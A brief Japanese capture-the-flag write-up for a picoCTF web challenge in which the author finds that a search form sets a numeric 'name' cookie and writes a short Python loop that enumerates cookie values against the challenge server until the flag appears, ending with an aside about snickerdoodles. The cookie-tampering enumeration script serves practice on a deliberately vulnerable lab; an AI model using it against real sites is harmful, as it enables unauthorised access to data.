WriteUp
問題のURLにアクセスするとクッキーの名称を入力してSearchボタンを押すと
クッキーに応じたテキストが返ってくる。
問題のタイトルからCookieをいじることがわかる。
'Snickerdoodle'と入力してSearchボタンを押すとCookieでname=0とセットして
POSTしている。
クッキー以外のテキストを入力してSearchボタンをおすとname=-1とセットして
POSTしている。
適当にnameをセットしてPOSTするコードを書いてみるとフラグが手に入った。
url = "http://mercury.picoctf.net:54219/search"
for i in range(0,100):
print(f"\r{i}", end="", flush=True)
time.sleep(1)
cookies = {'name': f'{i}'}
response = requests.post(url, cookies=cookies)
if re.findall(r"picoCTF\{.*\}", response.text):
break
print(response.text)
余談
スニッカードゥードル(Snickerdoodle)は、シナモンシュガーでコーティングされたアメリカのお菓子で、クッキーの一種です。
へー